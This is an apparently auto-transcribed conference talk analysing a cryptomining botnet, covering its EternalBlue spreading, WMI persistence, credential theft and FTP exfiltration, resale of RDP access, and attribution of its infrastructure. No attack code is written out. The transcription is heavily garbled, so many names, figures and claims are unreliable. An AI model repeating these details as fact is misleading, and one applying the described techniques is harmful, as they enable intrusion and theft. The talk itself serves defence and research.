2019 - Hidden Agenda The darker side of cryptocurrency botnet mining - Greg Foss

is going to talk about cryptocurrency botnets and all these other neat buzz words into here and actually make some sense out of it where he's going to pretend to be one of the other will see them for 30 minutes and then you can peplum all right all right you get her test drink right now all right cut a few so I just want to give value a cheers - who out to be security and Joe for letting us crash their office for the day thank you guys [Applause]

so today I wanna talk to you guys about is this botnet campaign that we've been tracking probe antenna what kind of made this turned into something actually interesting I think was worth at least putting some slides together um trim like polish it out because I have 30 minutes so I will see if we even have time for questions but I'll be around later there's some stuff like ways that we acquired some of this information that we have to talk about offline so we'll see when we get to Q at any time what so uh introduce myself my name is a great class and my principal threat researcher with the carbon black part of the threat analysis unit you need a lot

of traffic the botnets we build off the queries that you see within the whole not be a whole part black product line a lot of attacks a duration as well so anyone in here here the know that small memory it's kind of benares when an old esoteric it's not too much to present in the United it's kind of predominantly Russia attacked and a burial so but it is now branch nearly two states so now we're actually seeing a lot more of it here so a smaller girl is kind of interesting right this is not a new mod minute by any means this is one that kind of came out in late 2016 mid 2017 you know since

that time frame there's just a new right up we just came out I want to say about we could go by how to tread my credible they felt something neither Oh predominantly what this is is a crypto writing botnet you're just running XM rig and mining cryptocurrency on compromised Windows systems so what's interesting about that right well we were the first to get into this all the other intelligence that was out there just pointed to this being a basic commodity crypto minor you know they talks a little bit about the ability to spread by using a turtle blue which is kind of the most advanced part we came across and we actually really dug into

this well I didn't cover some of the really intended unique things that we found about the spot nets that made it kind of for concern image so I just wanted to highlight a couple of write-ups throw me out there because they're actually really good it just was like through the evolution of this campaign and do this day they're still evolving this campaign and expanding it order to effect additional house and just to expand their own reach and the Indigo the substrates so why should we care right why should you care this is a crypto minor purse you know something that like leveraging the best of information or something like that well because companies are going to

handle these threats differently so if you send someone a notification so you're working for black or essentially a vendor it doesn't points away so we see all these different companies and how they handle their threats and various different ways so if we tell them oh this is just like a PUA like actually unwanted application crypto money they're just like cool like let's install it and mom but the thing is why is important we really understand like looking at the whole aspect of how these systems become infected what else comes entrance like Tshering payloads related to these these pieces of malware this is the fact that this is actually being a lot of morbid attacks it's using a lot

of a building without system components to maintain persistence expand the reach into holes the organization and just the systems they've compromised and so it's a lot more to clean out them to say that moving the crypto miners it's very obvious with this so when we first came across this we actually just had a customer and you're doing a deployment and the customer rolled out her black defendants in this flag and they're like you know we've got minor but what was weird was just all the other stuff and ourselves been doing there's a lot of other activities that we were we're picking up from this and they're like it's just the right because we actually saw different actors

using the same situ networks to interact with the soap so kind of interesting so first we thought this is like a drive-by download or something healthy got affected we later find it found out that they are actually using sob and WMI respectively to do spreading across the roles over the Internet and both within the land once they get inside a company so the initial drop rate establishes persistence you have multiple different mechanisms and we'll dive into a little bit here I've essentially you know there is a smoothly do music register 30 to run DLL 32 all these abilities to establish persistence to multiple different situ servers they also did DNS poisoning they did that so that they

could take out analysts where we're going to look up hosts and stuff that was involved to something else and throw us off the trail and they did all these things just to make sure they were maintaining this access and also making the privileged access to certain processes all of those crypto mining of course they're just using XM something you see very common

no accelerate is a very popular venereal cryptocurrency minor and recent so popular of nowhere as it uses the CPU so you infect hundreds of thousands of posts and just mine using the CPU you can actually get a lot of and they're also using the maternal glue to spread laterally within organizations and spread across the internet as well and one of the real interesting things here is you saw different people from Russia and China actually leveraging this back connects us to actually be post exploitation activities on these hoes and it's kind of interesting we'll get into that a bit but what this turned into is actually a much larger known as a botnet spread except where these

services where you can print malware or services and actually purchase access into organizations and will breakdown kind of that that way back in as well so just know they're cooked an oddity minor no definitely not a commodity minor so using a lot of living off the land in facts for persistence provision remote access ways they would also you know if they compromised the server over the Internet they would immediately acquire water is to block level access so it's become inaccurate they also have an initial process of killing off and every community minor that was out there they have to list of files those costly updated they would check and they were just killing these off but make sure

that they were blacklist on this those going forward it's only their remaining software it actually be able to run and the real interesting part is factor sensitive data we'll get into that in more detail in a bit but multiple C 2 is DNS poisoning oh stuff now who are they primarily going after mostly Russia we saw a lot of people in India China kind of all over the place not so much in the United States at this time so this is a proof point and this is back about it here together together this data so this is now expanded quite a bit to actually include a lot of what a United States they're starting to spread and

continuing to kind of evolve their their own coverage now what's interesting with this in terms of like why is other write-ups didn't include a lot of details that we found here doing our analysis it looks like so he came up with a few different kind of scenarios that line up with what's happened both with this campaign within the news within the cryptocurrency industry that kind of lead to why they've looked at expanding into different revenue streams using the same malware so on the top here you can see the value of Manero over times this is in 2016 beginning of 2016 to July of this year and you can see a banana shot up for a while and it's been out there

peep there but the actual small burner campaign it's been active for a while it really kicked off to like early 2017 and at the point where they got about like halfway through their mining operation and ISP actually caught on to what they were doing and it's labeled a sinkhole of one third of their entire binding traffic so all of a sudden they lost this massive amount of revenue right up to this point they didn't mind over 8,000 Venera upwards of at the time worth about three billion dollars so they've made quite a bit of money just for mining but at the same time you see the price of arrow starts to give they were just simple all of a sudden you

know maybe that's when they decided to shift tactics and start adding in the fact of information and resale of that data that's another kind of tactic to I kind of expand their apartment but another interesting aspect here you see money Kings you know hear about my Kings before my Kings is a pre massive campaign and so this is actually this is actually a botnet spreader this one of these services where you can actually rent out and buy you know malware this exists companies we ended up dubbing that's essentially access mining we just buy your way in to organizations this is a great place to do that is through the whole of my things kind of Network and

what's interesting is we actually found a link between these two campaigns actually shows that the guys who created small burgerito actually were the founders of my Kings we're able to definitely link them together kind of interesting so you will care care dollars so what I wanted to show you guys is just a high level overview of like this is actually everything that this one piece of malware is doing once it infects your system now we're not going to break down all of this because I only have 30 minutes but it's crazy right there's a lot of so I'm gonna do some highlights we'll just take a look at a couple of the fun stuff once

this is over I'm gonna play all over alright so some high that's right so it's all agree the funny thing about this like India as we look at this every you know a couple of days they were changing the names of ivories that changing the hashes every single system you is updated with new hashes so like you can use signature detection to stop this is something where there's too many like different types of payloads and different methods that they've implemented to infect systems but it was something where we have no actual behavioral techniques and we'll get to what they're actually doing some of the Arsenal a lot of this was PowerShell and the funny thing about all the PowerShell

they're using none of its encoded if there's one piece that's an encoded PowerShell command and it's the street W my event subscription creation everything else is like plain text and it's like they're not even trying to hide like these guys do not care at all one of the things they do this kind of interesting is a repurposed a lot of existing libraries Fulford malware writers or existing Windows system components like the Capitals most they and I ended up bringing their own versions these files and switching them out on the portal s what those are used for in a bit are these 80 cats both binary version and the PowerShell version a lot of crypto miners you know some sometimes

they would actually change miners or they would induce like weird stuff like injecting other processes and brining from that but a lot of us came not to at the end of the day it was started with PowerShell and ended with PowerShell and BB scripts and that's how they did their data collection and exfiltration so what does this look like when you initially get affected and this is the initial command line that you'll see on an employment that's getting infected with the small and ergonomic this is what it looks like when it comes in via an eternal bloom so someone scans to those needs access immediately execute see schematic we actually got a hold of their actual

original payloads that they were using and we'll show that but that first command there that's just creating that WI and that subscription and so they're trying to do this very first thing establish that persistence make sure they have a way back into the system these next couple scripts a lot of them just pull down different lists of pilots or other miners that they want to get all other know pieces of data that they're kind of interested in collecting so they all have various specific jobs and every time you run this these will will be updated as well so it'll from different posts these are changing kind of constantly that's what goes next like download stream kind of sections

are violated but then at the bottom when you see register 32 that's using a fully new method to establish persistence to in this case three different CTU servers to pull those down and and ran them and it's funny because they're not stages like it says one two three they're just literally like different SI toos that it's pulling back to after establishes persistence so this first stage after some of the binaries that are actually dropped once the PowerShell executes are these three files which are kind of the key here and now at this point these names of these files have changed so you know it's something where every week we're kind of running through this year

modifying you know which these files are but that's listen we would just going to overwrite the Master Boot Record so when we were detonating this within our early animals we were finding it was crashing and it was due to this so we had to actually test this on some bare metal just to make sure we got the whole telemetry of all this happening here I'm gonna skip over yes yes EPX per second but you do not yet see it's kind of a secondary secondary payload that did a lot of the DNS poisoning and rather traffic so as you're making her plus they would actually go through a unity XE or it would inject into another process so

into control and what you were we were able to do look that side well PSC px is like kind of where all of the other magic comes from this is like the core binary that delivers everything else that ended up being more interesting in terms of weight we have time to talk about here the mining itself turned out to be actually like the most innocuous part of this whole thing so most funny is this miner actually sleeps for 14 hours after every time you need them out so they want to wait till your death basically they're definitely not touching the subtle support it puts on and once you vote into the poster you you know

move the mouse or something like that immediately stops kills the process and just disappears entirely until until the next time it starts up again now this would we do remote access here this is just an example of one of these one of the pages that has been called by this piece of malware so as you can see here we're just running W script show VF command dot exe to use J scripts to run all of our code here which is just shellcode shoveling a shell out and this is set up to run on jobs this runs just scheduled over time kind of maintain that access over time so by the way if you're looking for good new protections

anytime you see Chaney script running anything like PowerShell command I excellent a script that's a solid indicator third but the next interesting thing is the eternal is the best bet so anything your player on the open source you know after the shadow brokers leak and all that all the tools came out and everything so this is one of those repositories that kind of made some modifications the tool said it worked before easier but out but it's actually they all they cloned the skin Oh Riko and added their own exploitation code to to the actual eternal payloads so this is what it actually looks like so everything in here you see is exactly as it is within Megiddo except for this

part so already here is just basically that are going to execute once you actually successfully exploit the system using eternal blue so over here if you want to read through this I think I can send this to you later but essentially this is just running everything that we saw initially you know setting up the W like resistance establishing persistence on the host basically making sure that they have a really good for this house now where this gets really interesting and where we started having a little too much fun with this is what gets into the part about access money so what is mine is is essentially when you've steal data from a host so say you've compromised

this house steal the usernames passwords domain information on a more direct access to the host and then you take that data pushed up to a deep I park it and actually sell it directly so you know and by direct access into organization by credentials to a company some of these are either just straight RDP open but they also do a lot of math across needs and look at you know how their price is when they sell so they will sell those for different values depending on the speed you know is this a fast processing was the network throughput is this a main target organization some of those go for thousands of dollars so this piece of

malware the pieces kind of highlighted here with the actually what actually does this script sts-1 powershell script goes out and it downloads s context which contains all the w my persistence kind of mechanisms runs that and then those downloads I held on text kills all the processes listed within that and then it downloads an execute the script called up dot text and what up context does is it just wipes information on the host yeah those credentials domain information all that kind of stuff and then it uploads it the FTP just directly to be saw your plain text so but here's actually what that script looks like it's funny they didn't obfuscate needless so we were taking a look at

this it's pretty straightforward right they're looking at what's your external IP what are the processes running on your host and this is after they've killed them as well I figure pretty us we're version windows are going calculate the memory capacity could be cuter you know how they're going to price this later with CPU information basically you know is this gonna be the sister of finding something morning just for something else so then it goes one points this is the second half of the script here so right here anyone recognize this will power sploit maybe pets so just directly pulled out from their game and executed then here they're just basically writing all this data to a raw

text file and then here is where they upload over FTP you didn't see anything interesting here about that Tiki part yeah so I like the twenty these guys do not give a right I don't care if we find it so else finds it like tell us the people are guaranteed monitoring these guys on top of us so you know it's just kind of funny to see how how open yeah as long as it actually focus on are really trying to you don't understand how they're trying to hide how they're using encoding and stuff like that to me to evade but just in our honoring of this we found over a hundred thousand unique infections from this one FTP

server now this was one FTP server out of six at the time so there multiple of these going to different locations all uploading data in the same way we looked at some of the other research work that was out there so we've got over 500 thousand unique infections just within a week of this so you can see how how actually pretty large this campaign is for being such a simple and a piece of malware preferred for what they're doing but this really gets back to like you know when you have these potentially unwanted applications and things like that that you may not view as a big deal on your network you do really want to

think about it as like you know is this doing something else that I don't know about what happened when this was loaded on mice you know you want to get that whole attack chain to understand and really make sure that you're not letting other aspects kind of slip by because with this case a lot of the people that haven't we talked to about this one in particular basically just went we needed the binary but still had all the existing persistence mechanisms in place so something that was just completely mixed so Jesus says about what kind of no it's not stopping there I want to go into mapping out the infrastructure these guys this is the

part I can't I can't show kind of everything because they're actually still actively doing some fun stuff with these guys cover the stuff that's kind of out there already so this is one of that TP servers we're looking at just the history historical data around the set TP server and a lot of their other infrastructure that we found initially we're thinking this is actually a Chinese campaign because we saw a lot of Chinese malware you know within yeah exif data some of the libraries were looking at and just some of the communications we saw on the back end but that we may not have gotten into essentially we it's kind of interesting because this is actually just a

compromised server we thought that this is one word you know this is one of many servers they took over and they just started assigning their own DNS entries to these compromised servers in order to maintain their their persistence so once we started pulling these the commonalities between them we actually found this one which is kind of interesting bill kill me now at gmail.com this address if you do any research on this you actually see they're tied to a lot of interesting stuff out there including I so not just the small McGrew campaign but they're also tied to my kids which my Kings is a lot bigger this is where it's actually getting into you know Russian much

larger and you know nation state level kind of campaigns and so tying these together is kind of interesting we're actually able to find a gap in the historical registration or one of these domains so my Kings dot PW used to be one of their main primary domains they had a lot of kind of coordination with all the other Vikings kind of work well you can see a bunch of these other ones are actually still active but like in some PW is kind of one almost funny is that the guy actually led with their private registration expired at one point and so they had this gap that they actually got their email associated the funny thing too quickly after this they

switch and all of a sudden Alex I'm very a mail drop for us so as soon as they saw this was exposed they switched it and now it's still our kind of the register again so we decided to switch to phone numbers phone numbers are fun you're trying to get across and see who owns doing all of these came back to the same Russian phone number just kind of weird right it's not something that's even validated when you create a domain so why use something that you have actually they use the same across everything else for whatever reason did how many of these are all the names associated with each of these so this is

the phone number it's a Russian phone number that's associated with all these registries of domains as for me they usually say the phone number but then these names like na or and EF and stuff like that so it's just kind of funny that that they would know we should we should call it now how much does that cost to come Russia but then there's the Iraqis these are all the IPS that are associated with that same domain so kind of interesting right so where does this go this goes to a Moscow taxi company like is this is what it looks like there's like a little train station behind there and stuff so so I don't know it's just kind of weird

that they will sign up to use the same same connection we did find some other stuff but you had to talk to you about over beers later but but for now to just keep it to what's out there so the physical location of these the ones that are actually owned by the adversary we're all based Russia the other ones that we found all being compromised assets so there are all those servers that you know within the United States they've taken over quite a few of us they're mostly on IAS servers and they were just going out popping these servers and then deploying either FTP or their own web servers to them to handle different aspects of the

overall security the other aspect is kind of interesting so bill killed me now is kind of the main email address that's associated with this campaign we also found this one that's associated with almost all of the Vikings works but not this momentary one's kind of interesting this is a glad I didn't talk and 86ed me of are you kind of an interesting one and that one we can talk about that later but so excess mining work places anyone here hangout the government on Deep Web and like have run into any of these kind of places so so this one right here we were looking at as a login form to a desktop protocol shop so what they're

selling here is just direct access into systems that are compromised or RDP so a lot of these you come into home some that just give you an actual login form one of these we found they actually use a guacamole to play there rather than face a might log into their their server like it's pretty legit it's like better than some commercial stuff is out there this is what the actual page looks like like bring by access to these to these systems so over here you see the IP and actually when you purchase you'll get the whole IP they won't show it to you until because they don't want you to just go pop it yourself whether it shows

the country shows stay city zip code even shows the OS Ram speed all that cut stuff and then it's all priced accordingly based on all right I got 30 seconds 29 seconds so okay overall we saw a majority these are about five dollars of those well there are some you know and in the middle range like twelve dollars or so seem to be kind of average for like a pretty decent post for getting access to and this is across all of the access mining marketplaces and not just already one so kind of interesting but over time we're seeing this steadily increase in terms of the amount of systems that are available and the price so it was definitely something

that we're seeing kind of growing in terms of a service a service offering if you will but the very last piece I wanted to touch on is what they're actually doing with the cryptocurrency and in here play around with tumblers Bitcoin tumblers it's stuff like that well I chose this one to highlight is this one specific for an arrow so basically this is pre longer points you can push the Monaro to this and then push hit client and then you can give different types of coins out of it this makes it really easy longer that's funny so it's kind of one of the ways I'm gonna shuffle the points through push it down to a Pete wallet transferred over

to another wallet actually take money out now course there's stuff like cheat Alice's and questions alright perfect I'm gonna keep going basically once very short like it's hard to condense all this down this is originally like a couple our briefing to run through but essentially all of this is rapidly changing it shows kind of that need to really focus on you know it may just come off as a QA or adware or something like that but oftentimes it has all these ulterior motives associated with that to make it more profitable for the person who owns the bhana so we definitely want to look into all of these things and treat them all kind of with the same level record so that's

kind of the main the main point here but if you want to read more about this we actually have threat intelligence this we have some posts on our customers portal as well that goes like some inquiries of things they can find this activity and then we have a white paper that talks more about the larger aspect of access line in general